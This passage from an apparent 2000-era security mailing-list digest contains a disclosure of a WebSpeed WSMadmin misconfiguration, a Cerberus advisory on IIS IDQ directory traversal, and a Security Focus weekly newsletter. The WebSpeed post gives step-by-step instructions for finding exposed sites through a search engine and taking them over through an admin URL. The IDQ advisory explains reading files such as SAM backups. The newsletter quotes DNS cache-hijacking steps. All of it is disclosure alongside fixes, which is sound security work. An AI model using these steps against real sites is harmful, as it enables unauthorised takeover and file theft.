fix it but since then I've not seen any fixes released. I also pondered whether or not to release this information because some rather large web databases use Webspeed but I do believe in full disclosure as the best security so here goes... Webspeed is a website creation language used by some of the larger db based websites on the net. Version 3 comes with a java GUI configuration program. This configuration program has certain security setting options in it. One of which doesn't actually do anything. There is one option to turn off access to a utility called WSMadmin. It's in the messenger section of the GUI config program. However checking or unchecking this option doesn't change anything. In fact to turn this feature off you have to hand edit the ubroker.properties file. Look for the following entries: AllowMsngrCmds=1 and each time you find this set it =0 in each of the sections. This will disable the feature (you want to do this on the production server). AllowMsngrCmds=0 Ok, now the exploit to show how serious an issue this is on the web. It's just a misconfiguration really but it's caused by a bug in the java config program (I tested the NT version but since the config program is java it may also affect other platforms) Exploit: go to search engines and search for "wsisa.dll", I used google 3rd page or further (first 3 pages are all junk) Go to URL similar to http://www.domain.com/scripts/wsisa.dll/extra/somepage.htm with your browser change the url in the browser to http://www.domain.com/scripts/wsisa.dll/WService=anything?WSMadmin (note capitals are important) click on the link "End Sessions Logging and Display Sessions Info" (note you may have to start logging first then stop it if they've never used the logging feature) When you pick the End Sessions Logging choice it displays the log, find a statement in the log for the default service "Default Service = nameofservice" back up one page (hit your back button) type nameofservice into the Verify WebSpeed Configuration box and click the verify button. If everything worked you now own their site. I won't explain how to use the utility but anyone familiar with this should know exactly how dangerous this is. Geo. _____________________________________________________________________ ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net @HWA 33.0 Cerberus Information Security Advisory (CISADV000202) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Cerberus Information Security Advisory (CISADV000202) http://www.cerberus-infosec.co.uk/advisories.html Released : 2nd February 2000 Name : IDQ Affected Systems : Microsoft Windows NT 4 running Internet Information Server 3 or 4 Issue : Attackers can access files outside of the web virtual directory system Author : David Litchfield (mnemonix@globalnet.co.uk) Description ********* Any web site running Internet Information Server 3 or 4 and using Internet Data Query files to provide search functionality on the site may be exposed. IIS also comes with some sample IDQ scripts that are vulnerable so any website with these sample files left on are at risk. Using these IDQ scripts or even custom scripts it is possible to break outside of the web virtual root and gain unathorized access to files, such as log files and in certain cases the backup version of the Security Accounts Manager (sam._) It does require for the attacker to know the path to the file, for the file to be on the same logical disk drive as the IDQ file and for ACL to allow read access to the anonymous Internet account or the Everyone/guests group. Details ***** The extent of this security hole depends upon whether the recent "webhits" patch has been installed. See http://www.microsoft.com/technet/security/bulletin/ms00-006.asp If the patch has been installed there is still a vulnerability - however, those that have not installed this patch are most at risk. Microsoft are re-releasing this advisory and the updated patch. Please note that Windows 2000 does not seem to be vulnerable to this. Cerberus' vulnerability scanner, CIS, has now been updated to check for this issue. For those that already have a copy of the scanner you can download the updated module from http://www.cerberus-infosec.co.uk/webscan.dll - however those that do not yet have the scanner, if you would like a copy please go to http://www.cerberus-infosec.co.uk/ and follow the Cerberus Internet Scanner link on the frontpage. If the "webhits" patch HAS NOT been installed ************************************ Any idq file that resolves remote user input for any part of the template file is dangerous. eg: CiTemplate = %TemplateName% The ISAPI application that deals with IDQ queries is idq.dll and it will follow double dots in paths to template files, meaning an attacker can break out of the web root. If the idq file appends .htx to the CiTemplate eg: CiTemplate=/iissamples/issamples/%TemplateName%.htx some may think this will limit attackers to viewing only .htx files. Not so. Quoting from the Index Server documentation (/iishelp/ix/htm/ixidqhlp.htm), "Index Server does not support physical paths longer than the Windows NT shell limit (260 characters)." Due to this limit it is possible to append lots of spaces onto the name of the file we want to read and thereby pushing the .htx out of the buffer and we're served back the file. IDQ files known to be at risk in one way or another: prxdocs/misc/prxrch.idq iissamples/issamples/query.idq iissamples/exair/Search/search.idq iissamples/exair/Search/query.idq iissamples/issamples/fastq.idq There are may be more. If the "webhits" patch HAS been installed ******************************* Machines that have had the patch installed will only be vulnerable if the IDQ file does not specify a .htx extention eg: CiTemplate = %TemplateName% and CiTemplate = /somedir/otherdir/%TemplateName% are vulnerable whereas CiTemplate = /somedir/otherdir/%TemplateName%.htx is not vulnerable. Solution: ******* Review your IDQ files to determine if you are at risk. If so edit them and use hardcoded template files. eg CiTemplate=%TemplateName% to CiTemplate=/your-virtual-directory/your-htx-file.htx and then edit your search form to reflect this change. Remove any sample files from the system - not just idq files. Apply the updated patch. About Cerberus Information Security, Ltd ******************************** Cerberus Information Security, Ltd, a UK company, are specialists in penetration testing and other security auditing services. They are the developers of CIS (Cerberus' Internet security scanner) available for free from their website: http://www.cerberus-infosec.co.uk To ensure that the Cerberus Security Team remains one of the strongest security audit teams available globally they continually research operating system and popular service software vulnerabilites leading to the discovery of "world first" issues. This not only keeps the team sharp but also helps the industry and vendors as a whole ultimately protecting the end consumer. As testimony to their ability and expertise one just has to look at exactly how many major vulnerabilities have been discovered by the Cerberus Security Team - over 40 to date, making them a clear leader of companies offering such security services. Founded in late 1999, by Mark and David Litchfield, Cerberus Information Security, Ltd are located in London, UK but serves customers across the World. For more information about Cerberus Information Security, Ltd please visit their website or call on +44(0) 181 661 7405 Permission is hereby granted to copy or redistribute this advisory but only in its entirety. Copyright (C) 2000 by Cerberus Information Security, Ltd ------------------------------------------------------------------------ Delivery co-sponsored by Trend Micro, Inc.: http://www.antivirus.com. ScanMail for Microsoft Exchange * Stops viruses from spreading through Exchange Servers. * Eliminates viruses from email in real time, even unknown macro viruses * Filters spam (unsolicited junk email). * Sends customized virus warning messages to specific parties and admins * Remote installation and management via web or ScanMail's Windows GUI ------------------------------------------------------------------------ _____________________________________________________________________ ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net @HWA 34.0 Security Focus Newsletter #26 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Security Focus Newsletter #26 Table of Contents: I. INTRODUCTION II. BUGTRAQ SUMMARY 1. Multiple Vendor BSD /proc File Sytem Vulnerability 2. DNS TLD & Out of Zone NS Domain Hijacking 3. Inter7 vpopmail (vchkpw) Buffer Overflow Vulnerability 4. VMware Symlink Vulnerability 5. HP Path MTU Discovery DoS Vulnerability 6. Microsoft East Asian Word Conversion Vulnerability 7. NT RDISK Registry Enumeration File Vulnerability 8. Qualcomm qpopper 'LIST' Buffer Overflow Vulnerability 9. NT Index Server Directory Traversal Vulnerability III. PATCH UPDATES 1. Vulnerability Patched: Qualcomm qpopper 'LIST' Buffer Overflow 2. Vulnerability Patched: NT Index Server Directory Traversal 3. Vulnerability Patched: Multiple Vendor BSD /proc File Sytem 4. Vulnerability Patched: Multiple Vendor BSD /proc File Sytem 5. Vulnerability Patched: Inter7 vpopmail (vchkpw) Buffer Overflow 6. Vulnerability Patched: NT RDISK Registry Enumeration File 7. Vulnerability Patched: Microsoft East Asian Word Conversion 8. Vulnerability Patched: Multiple Vendor BSD make /tmp Race IV. SECURITYFOCUS.COM TOP 6 NEWS ARTICLES 1. Outpost Leaves Data Unguarded (Mon Jan 24 2000) 2. Japan Says to Seek U.S. Help to Deal With Hackers (Tue Jan 25 2000) 3. Task Force Battles Online Criminals (Wed Jan 26 2000) 4. Smart card 'inventor' lands in jail (Thu Jan 27 2000) 5. Visa acknowledges cracker break-ins (Fri Jan 28 2000) 6. A Year Of Mass-Mailing Viruses (Fri Jan 28 2000) V. INCIDENTS SUMMARY 1. Got scanned again (Thread) 2. Unusual scan pattern (Thread) 3. Possible Probe = Possible Malfunction (Thread) 4. No Idea (Thread) 5. PC Anywhere client seems to probe class C of connected networks (Thread) 6. unapproved AXFR (Thread) 7. Connect thru PIX & ports 1727, 2209, 9200 (Thread) 8. Anti-Death Penalty (Thread) 9. Strange DNS/TCP activity (Thread) 10. eri? (Thread) 11. source port 321 (Thread) 12. Korea (again) (Thread) 13. BOGUS.IvCD File (Thread) 14. port 768 (Thread) 15. Extrange named messages (Thread) 16. Probes to tcp 2766 ('System V Listner') (Thread) 17. Possible attempt at hacking? (Thread) 18. DNS update queries: another sort of suspicious activity. (Thread) VI. VULN-DEV RESEARCH LIST SUMMARY 1. Shadow (Thread) 2. things to break.. (Thread) 3. HTTP scanners? (summary, long) (Thread) 4. CGI insecurities (Thread) 5. ICQ Pass Cracker. (Thread) 6. File Share Vacuum (Thread) 7. IIS4.0 .htw vulnerability (Thread) 8. Napster a little insecure? (Thread) 9. distributed.net and seti@home (Thread) VII. SECURITY JOBS Seeking Employment: 1. Prashant Vijay (Summer Internship) <vijay@eecs.tulane.edu> Seeking Staff: 1. Security Research Engineer (Atlanta, Ga) 2. Practice Manager w/PKI experience NYC, Philly or DC) 3. Lead Security Engineer - Bay Area/San Jose 4. Senior security engineers - Bay Area/San Jose 5. Virus coder wanted (San Antonio, TX) 6. Junior Security Engineers Needed (Maryland) VIII. SECURITY SURVEY RESULTS IX. SECURITY FOCUS TOP 6 TOOLS 1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT) 2. SecurityFocus.com Pager (Win95/98/NT) 3. lidentd 1.0p1 (Linux) 4. Cgi Sonar 1.0 (any system supporting perl) 5. Logcheck 1.1.1 (BSDI, Digital UNIX/Alpha, FreeBSD, HP-UX, Linux, NetBSD, OpenBSD, Solaris and SunOS) 6. Secret Sharer 1.0 1.0 (Windows 95/98) X. SPONSOR INFORMATION - CORE SDI http://www.core-sdi.com XI. SUBSCRIBE/UNSUBSCRIBE INFORMATION I. INTRODUCTION ----------------- Welcome to the SecurityFocus.com 'week in review' newsletter issue 26 for the time period of 2000-01-24 to 2000-01-30 sponsored by CORE SDI. CORE SDI is an international computer security research and development company. It's clients include 3 of the Big 5 chartered accountant firms for whom CORE SDI develops customized security auditing tools as well as several notable computer security product vendors, such as Network Associates. In addition to providing 'consultant to the consultant' services CORE also performs risk assesment and security infrastructure consulting for a large number of government and fortune 500 companies in both North and Latin America. http://www.core-sdi.com II. BUGTRAQ SUMMARY 2000-01-24 to 2000-01-30 --------------------------------------------- 1. Multiple Vendor BSD /proc File Sytem Vulnerability BugTraq ID: 940 Remote: No Date Published: 2000-01-21 Relevant URL: http://www.securityfocus.com/bid/940 Summary: Certain BSD derivative operating systems use an implantation of the /proc filesystem which is vulnerable to attack from malicious local users. This attack will gain the user root access to the host. The proc file system was originally designed to allow easy access to information about processes (hence the name). It's typical benefit is quicker access to memory hence more streamlined operations. As noted previously certain implementations have a serious vulnerability. In short, the vulnerability is that users may manipulate processes under system which use /proc to gain root privileges. The full details are covered at length in the advisory attached to the 'Credit' section of this vulnerability entry. 2. DNS TLD & Out of Zone NS Domain Hijacking BugTraq ID: 941 Remote: Yes Date Published: 2000-01-23 Relevant URL: http://www.securityfocus.com/bid/941 Summary: A vulnerability exists in the mechanism used by DNS, in general, to determine the name server associated with TLD's (top level domains). DNS is built upon levels of trust, and by exploiting single points of failure in this trust system, it becomes possible for an attacker to convince a caching nameserver that allows for recursion through it that the root server for a given TLD is something other than what it actually is. By consecutively performing these cache attacks, it could be possible for an attacker to entirely take over name service for any given domain. The vulnerability is actually not specific to TLD's. The same attack can be used to hijack any domain which has out of zone NS records, if any of the servers that act as the name server for the out of zone domain can be compromised. The simplest explanation was presented in the example provided by it's discoverer, Dan Bernstein, on the Bugtraq mailing list, on January 23, 2000: "Suppose an attacker can make recursive queries through your cache. Let me emphasize that this does not mean that the attacker is one of your beloved users; many programs act as DNS query-tunneling tools. Suppose the attacker is also able, somehow, to take over ns2.netsol.com. This isn't one of the .com servers, but it's a name server for the gtld-servers.net domain. Here's what happens: (1) The attacker asks your cache about z.com. Your cache contacts (say) k.root-servers.net, which provides a referral: com NS j.gtld-servers.net (among others) j.gtld-servers.net A 198.41.0.21 These records are cached. (2) The attacker asks your cache about z.gtld-servers.net. Your cache contacts (say) f.root-servers.net, which provides a referral: gtld-servers.net NS ns2.netsol.com (among others) ns2.netsol.com A 207.159.77.19 These records are cached. (3) The attacker takes over ns2.netsol.com. (4) The attacker asks your cache about zz.gtld-servers.net. Your cache contacts ns2.netsol.com, and the attacker answers: zz.gtld-servers.net CNAME j.gtld-servers.net j.gtld-servers.net A 1.2.3.4 These records are cached, wiping out the obsolete j glue. (5) A legitimate user asks your cache about yahoo.com. Your cache contacts j.gtld-servers.net, and the attacker answers: yahoo.com A 1.2.3.4 The user contacts yahoo.com at that address." The attack offered requires that an attacker be able to compromise the operation of the DNS server running on, in this case, ns2.netsol.com, although this is not the only server that could potentially be used to launch an attack of this style. The author further indicates that there are in excess of 200 servers that could be used to manipulate resolution of all the .COM domains. 3. Inter7 vpopmail (vchkpw) Buffer Overflow Vulnerability BugTraq ID: 942 Remote: Yes Date Published: 2000-01-21 Relevant URL: http://www.securityfocus.com/bid/942 Summary: Vpopmail (vchkpw) is free GPL software package built to help manage virtual domains and non /etc/passwd email accounts on Qmail mail servers. This package is developed by Inter7 (Referenced in the 'Credit' section) and is not shipped, maintained or supported by the main Qmail distribution. Certain versions of this software are vulnerable to a remote buffer overflow attack in the password authentication of vpopmail. 4. VMware Symlink Vulnerability BugTraq ID: 943 Remote: No Date Published: 2000-01-21 Relevant URL: http://www.securityfocus.com/bid/943 Summary: VMware is software that runs multiple virtual computers on a single PC, at the same time, without partitioning or rebooting. Certain versions of the VMWare for Linux product do not perform /tmp file sanity checking and create files in the /tmp directory which will follow symlinks. This may be used by a malicious user to overwrite any file (with log data) which falls within the write permissions of the user ID which VMWare excecutes as. Typically this is root. This attack will most likely result in a denial of service and not a root level compromise. 5. HP Path MTU Discovery DoS Vulnerability BugTraq ID: 944 Remote: Yes Date Published: 2000-01-24 Relevant URL: http://www.securityfocus.com/bid/944 Summary: A potential denial of service exists in Hewlett-Packard's proprietary protocol for discovering the maximum path MTU (PMTU) for a give connection. This feature could potentially be used to cause denial of services, using HPUX machines as "amplifiers." Essentially, HP machines which are vulnerable can, under certain conditions, be coerced in to sending far more data outbound than they receive inbound. By forging source addresses, it is possible to send a small quantity of packets purporting to be from a given source, and cause the HPUX machine to send multiple packets in response. This could potentially be used as a denial of service. HP's proprietary path discover protocol works by sending data in parallel with ICMP packets being used for path discovery. While exact details of the nature of the denial of service were not made public, presumably it could be possible to utilize UDP packets, and default UDP services to start the chain of events leading to a denial of service 6. Microsoft East Asian Word Conversion Vulnerability BugTraq ID: 946 Remote: No Date Published: 2000-01-20 Relevant URL: http://www.securityfocus.com/bid/946 Summary: East Asian language versions of Word and Powerpoint are susceptible to a buffer overflow exploit. The overflowable buffer is in the code that converts Word 5 documents into newer formats. Word 97, 98, and 2000 will automatically convert older files into the new format upon loading. If a specially-modified Chinese, Japanese or Korean Word 5 document is loaded into a newer version of Word or PowerPoint, arbitrary code can be executed during the conversion process, at the privilege level of the current user. 7. NT RDISK Registry Enumeration File Vulnerability BugTraq ID: 947 Remote: No Date Published: 2000-01-21 Relevant URL: http://www.securityfocus.com/bid/947 Summary: The Rdisk utility shipped with all versions of Windows NT4.0 is used to make an Emergency Repair Disk. During the creation of this disk, a temporary file ($$hive$$.tmp) is created in the %systemroot%\repair directory that contains the registry hives while they are being backed up. The group Everyone has Read permission to this file, and in this manner sensitive information about the server could be leaked. The file is put in a location that is not shared by default, and is removed immediately after the disk is created. The only likely scenario where this could be exploited is in the case of NT Terminal Server, where an administrator and a regular user could both be logged in interactively at the same time. 8. Qualcomm qpopper 'LIST' Buffer Overflow Vulnerability BugTraq ID: 948 Remote: Yes Date Published: 2000-01-26 Relevant URL: http://www.securityfocus.com/bid/948 Summary: There is a remotely exploitable buffer overflow in Qaulcomm's 'qpopper' daemon which allows users already in possession of a username and password for a POP account to compromise the server running the qpopper daemon. The problem lies in the code to handles the 'LIST' command available to logged in users. By providing an overly long user supplied argument a buffer may be overflowed resulting in the attacker gaining access with the user ID (UID) of the user who's account is being used for the attack and the group ID (GID) mail. This will result in remote access to the server itself and possibly (depending on how the machine is configured) access to read system users mail via the GID mail. 9. NT Index Server Directory Traversal Vulnerability BugTraq ID: 950 Remote: Yes Date Published: 2000-01-26 Relevant URL: http://www.securityfocus.com/bid/950 Summary: Index Server 2.0 is a utility included in the NT 4.0 Option Pack. The functionality provided by Index Service has been built into Windows 2000 as Indexing Services. When combined with IIS, Index Server and Indexing Services include the ability to view web search results in their original context. It will generate an html page showing the query terms in a short excerpt of the surrounding text for each page returned, along with a link to that page. This is known as "Hit Highlighting". To do this, it supports the .htw filetype which is handled by the webhits.dll ISAPI application. This dll will allow the use of the '../' directory traversal string in the selection of a template file. This will allow for remote, unauthenticated viewing of any file on the system whose location is known by the attacker. III. PATCH UPDATES 2000-01-24 to 2000-01-30 ------------------------------------------- 1. Vendor: Qualcomm Product: Qpopper Vulnerability Patched: Qualcomm qpopper 'LIST' Buffer Overflow Bugtraq ID: 948 Relevant URLS: http://www.eudora.com/freeware/qpop.html#BUFFER http://www.securityfocus.com/bid/948 Patch Location: ftp://ftp.qualcomm.com/eudora/servers/unix/popper/qpopper3.0b31.tar.Z 2. Vendor: Microsoft Product: Index Server for Windows NT and 2000 Vulnerability Patched: NT Index Server Directory Traversal Bugtraq ID: 950 Relevant URLS: http://www.microsoft.com/security http://www.securityfocus.com/bid/950 Patch Locations: Index Server 2.0: Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17727 Alpha: http://www.microsoft.com/downloads/release.asp?ReleaseID=17728 Indexing Services for Windows 2000: Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17726 3. Vendor: OpenBSD Product: OpenBSD Vulnerability Patched: Multiple Vendor BSD /proc File Sytem Bugtraq ID: 940 Relevant URLS: http://www.openbsd.org/errata.html http://www.securityfocus.com/bid/940 Patch Location: http://www.openbsd.org/errata.html#procfs 4. Vendor: FreeBSD Product: FreeBSD Vulnerability Patched: Multiple Vendor BSD /proc File Sytem Bugtraq ID: 940 Relevant URLS: http://www.freebsd.org/security/ http://www.securityfocus.com/bid/940 Patch Location: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:02/procfs.patch 5. Vendor: Inter7 Product: vpopmail Vulnerability Patched: Inter7 vpopmail (vchkpw) Buffer Overflow Bugtraq ID: 942 Relevant URLS: http://www.inter7.com/ http://www.securityfocus.com/bid/942 Patch Location: http://www.inter7.com/vpopmail/ (version 3.1.11e) 6. Vendor: Microsoft Product: NT 4.0 Terminal Server Edition Vulnerability Patched: NT RDISK Registry Enumeration File Bugtraq ID: 947 Relevant URLS: http://www.microsoft.com/security http://www.securityfocus.com/bid/947 Patch Location: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=17384 7. Vendor: Microsoft Product: Office (All versions, including word and powerpoint) Vulnerability Patched: Microsoft East Asian Word Conversion Bugtraq ID: 946 Relevant URLS: http://www.microsoft.com/security http://www.securityfocus.com/bid/946 Patch Locations: - Word 97 or 98, PowerPoint 98: - US: http://officeupdate.microsoft.com/downloaddetails/ww5pkg.htm Japan: http://officeupdate.microsoft.com/japan/downloaddetails/MalformedData-97.htm Korea: http://officeupdate.microsoft.com/korea/downloaddetails/MalformedData-97.htm China: http://officeupdate.microsoft.com/china/downloaddetails/MalformedData-97.htm Taiwan: http://officeupdate.microsoft.com/taiwan/downloaddetails/MalformedData-97.htm Hong Kong: http://officeupdate.microsoft.com/hk/downloaddetails/MalformedData-97.htm - Converter Pack 2000; Office 2000 with Multilanguage Pack; Word 2000, PowerPoint 2000: - US: http://officeupdate.microsoft.com/2000/downloaddetails/ww5pkg.htm Japan: http://officeupdate.microsoft.com/japan/downloaddetails/2000/MalformedData-2K.htm Korea: http://officeupdate.microsoft.com/korea/downloaddetails/2000/MalformedData-2K.htm China: http://officeupdate.microsoft.com/china/downloaddetails/2000/MalformedData-2K.htm Taiwan: http://officeupdate.microsoft.com/taiwan/downloaddetails/2000/MalformedData-2K.htm Hong Kong: http://officeupdate.microsoft.com/hk/downloaddetails/2000/MalformedData-2K.htm 8. Vendor: FreeBSD Product: FreeBSD Vulnerability Patched: Multiple Vendor BSD make /tmp Race Condition Bugtraq ID: 939 Relevant URLS: http://www.freebsd.org/security http://www.securityfocus.com/bid/939 Patch locations: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:01/make.patch IV. SECURITYFOCUS.COM TOP 6 NEWS ARTICLES ----------------------------------------- 1. Outpost Leaves Data Unguarded (Mon Jan 24 2000) Excerpt: While James Wynne was checking his online order Friday at Outpost.com, he noticed something curious -- he could check orders from other people, too. Relevant URL: http://www.wired.com/news/technology/0,1282,33842,00.html 2. Japan Says to Seek U.S. Help to Deal With Hackers (Tue Jan 25 2000) Excerpt: Japan said on Tuesday it will seek help from the United States in an investigation into hackers who penetrated two government Web sites. Relevant URL: http://news.excite.com/news/r/000125/00/net-japan-hackers 3. Task Force Battles Online Criminals (Wed Jan 26 2000) Excerpt: Ground zero in California's war against Internet crime is behind a dumpster hard by a hamburger stand in a faded Sacramento County welfare building. This is the headquarters of the Sacramento Valley high-tech task force, a multi-agency law enforcement team dedicated to tracking down e-crime, from stock swindlers to child pornographers. Relevant URL: http://www.latimes.com/news/asection/20000126/t000008196.html 4. Smart card 'inventor' lands in jail (Thu Jan 27 2000) Excerpt: In another case destined to fuel e-commerce anxieties, a Parisian computer programmer is facing counterfeiting and fraud charges after developing a homemade "smart card" that he says gave him the ability to fraudulently purchase goods and services throughout France. Relevant URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2428429,00.html?chkpt=zdnnstop 5. Visa acknowledges cracker break-ins (Fri Jan 28 2000) Excerpt: Visa International Inc. acknowledged this week that computer crackers broke into several servers in its global network last July and stole information. The company said that in December, it received a phone call and an e-mail demanding money in exchange for the data. Relevant URL: http://www.computerworld.com/home/print.nsf/all/000128e45a 6. A Year Of Mass-Mailing Viruses (Fri Jan 28 2000) Excerpt: In its review of the last 12 months, Sophos, the IT security firm, says that 1999 turned out to be a year when mass-mailed viruses arrived and dominated the scene. The annual review says that virus writers are now taking advantage of the Internet and corporate e-mail systems to distribute their creations more quickly. Relevant URL: http://www.currents.net/newstoday/00/01/28/news8.html V. INCIDENTS SUMMARY 2000-01-24 to 2000-01-30 --------------------------------------------- 1. Got scanned again (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=388C09A6.8EB8CC47@scalajwt.ro 2. Unusual scan pattern (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=SIMEON.10001241252.G29957@bluebottle.itss 3. Possible Probe = Possible Malfunction (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3.0.3.32.20000125180337.008613b0@mail.9netave.com 4. No Idea (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3926668584.948819473@pc27233.utdallas.edu 5. PC Anywhere client seems to probe class C of connected networks (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.GSO.4.21.0001251657260.10263-100000@barrel.dt.ecosoft.com 6. unapproved AXFR (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=SIMEON.10001251742.C24564@bluebottle.itss 7. Connect thru PIX & ports 1727, 2209, 9200 (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=D6C7B533F7C4D311BBD800001D121E7F0151D2@clmail.cmccontrols.com 8. Anti-Death Penalty (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.LNX.4.10.10001271722320.19098-100000@wr5z.localdomain 9. Strange DNS/TCP activity (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=20000127205611.23795.qmail@securityfocus.com 10. eri? (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=200001281146.FAA20359@hank.cs.utexas.edu 11. source port 321 (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=25608573.949079326302.JavaMail.imail@cheeks.excite.com 12. Korea (again) (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=20000128080948.A24408@sec.sprint.net 13. BOGUS.IvCD File (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=389071D7.6A217C7C@relaygroup.com 14. port 768 (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=87u2jyvahi.fsf@wiz.wiz 15. Extrange named messages (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=3.0.6.32.20000128103026.009ab760@mail.inforeti 16. Probes to tcp 2766 ('System V Listner') (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.LNX.4.10.10001281650150.29437-100000@unreal.sekure.org 17. Possible attempt at hacking? (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=004701bf6934$22f4fd00$6500a8c0@techstart.com.au 18. DNS update queries: another sort of suspicious activity. (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-01-22&thread=Pine.GSO.4.05.10001281604430.24882-100000@ns.kyrnet.kg VI. VULN-DEV RESEARCH LIST SUMMARY 2000-01-24 to 2000-01-30 ---------------------------------------------------------- 1. Shadow (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.GSO.4.21.0001250033010.7776-100000@stormbringer.eos.ncsu.edu 2. things to break.. (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.BSF.4.05.10001251139570.30155-100000@mail.us.netect.com 3. HTTP scanners? (summary, long) (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=388FD01F.A28F15BC@thievco.com 4. CGI insecurities (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=Pine.GSO.4.10.10001271034400.25323-100000@analog.rm-r.net 5. ICQ Pass Cracker. (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=200001270941.UAA21537@buffy.tpgi.com.au 6. File Share Vacuum (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=18708.000128@frisurf.no 7. IIS4.0 .htw vulnerability (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=4C95EE93836DD311AAA200805FED978904F2DB@mercury.globalintegrity.com 8. Napster a little insecure? (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=4.2.0.58.20000128171020.009c8ee0@mail.openline.com.br 9. distributed.net and seti@home (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-01-22&thread=NDBBJPBMKLJJBCHBNEAIKECOCBAA.jlintz@optonline.net VII. SECURITY JOBS SUMMARY 2000-01-24 to 2000-01-30 --------------------------------------------------- Seeking Employment: 1. Prashant Vijay (Summer Internship) <vijay@eecs.tulane.edu> Resume at: http://www.securityfocus.com/templates/archive.pike?list=77&msg=NDBBJEJEALCFECNEOEHPMEKBCAAA.vijay@eecs.tulane.edu&part=.1 Seeking Staff: 1. Security Research Engineer (Atlanta, Ga) Reply to: Samuel Cure <scure@iss.net> Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=20000124212259.7741.qmail@securityfocus.com 2. Practice Manager w/PKI experience NYC, Philly or DC) Reply to: Erik Voss <evoss@mrsaratoga.com> Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=00d201bf6832$f9cd5460$6775010a@saratoga3 3. Lead Security Engineer - Bay Area/San Jose Reply to: Sanjeev Kumar <sakumar@zambeel.com> Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=20000127015859.1308.qmail@securityfocus.com 4. Senior security engineers - Bay Area/San Jose Reply to: Erik Voss <evoss@mrsaratoga.com> Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=20000127020135.1478.qmail@securityfocus.com 5. Virus coder wanted (San Antonio, TX) Reply to: Drissel, James W. <james.drissel@cmet.af.mil> Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=CD11F9F59C6BD3118BF5009027B0F53B0884EC@adp-exch-1.cmet.af.mil 6. Junior Security Engineers Needed (Maryland) Reply to: Brian Mitchell <bmitchell@icscorp.com> Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=2000-01-22&msg=NCBBKIMIMKKMLDMGEHFKAEAKENAA.bmitchell@icscorp.com VIII. SECURITY SURVEY 2000-01-24 to 2000-01-30 ---------------------------------------------- Our current month long survey is: "Do you think security vendors exaggerate the importance of security issues as a marketing strategy?" Never 6% / 10 votes Rarely 30% / 48 votes Often 47% / 74 votes Always 14% / 23 votes Total number of votes: 155 votes IX. SECURITY FOCUS TOP 6 TOOLS 2000-01-24 to 2000-01-30 -------------------------------------------------------- 1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT) by RedShadow Relevant URL: http://www.rsh.kiev.ua Shadow Advantis Administator Tools - Ping (SSPing), Port Scanner, , IP Scanner, Site Info (is intended for fast definition of services started on the host), Network Port Scanner,Tracert, Telnet,Nslookup, Finger,Echo,Time,UPD test,File Info, Compare File, Netstat, SysInfo,Crypt, Crc File, DBF view/edit, DiskInfo, NTprocess, Keyboard test, DNS info Shadow Hack and Crack - WinNuke, Mail Bomber,POP3,HTTP,SOCKS,FTP Crack (definitions of the password by a method of 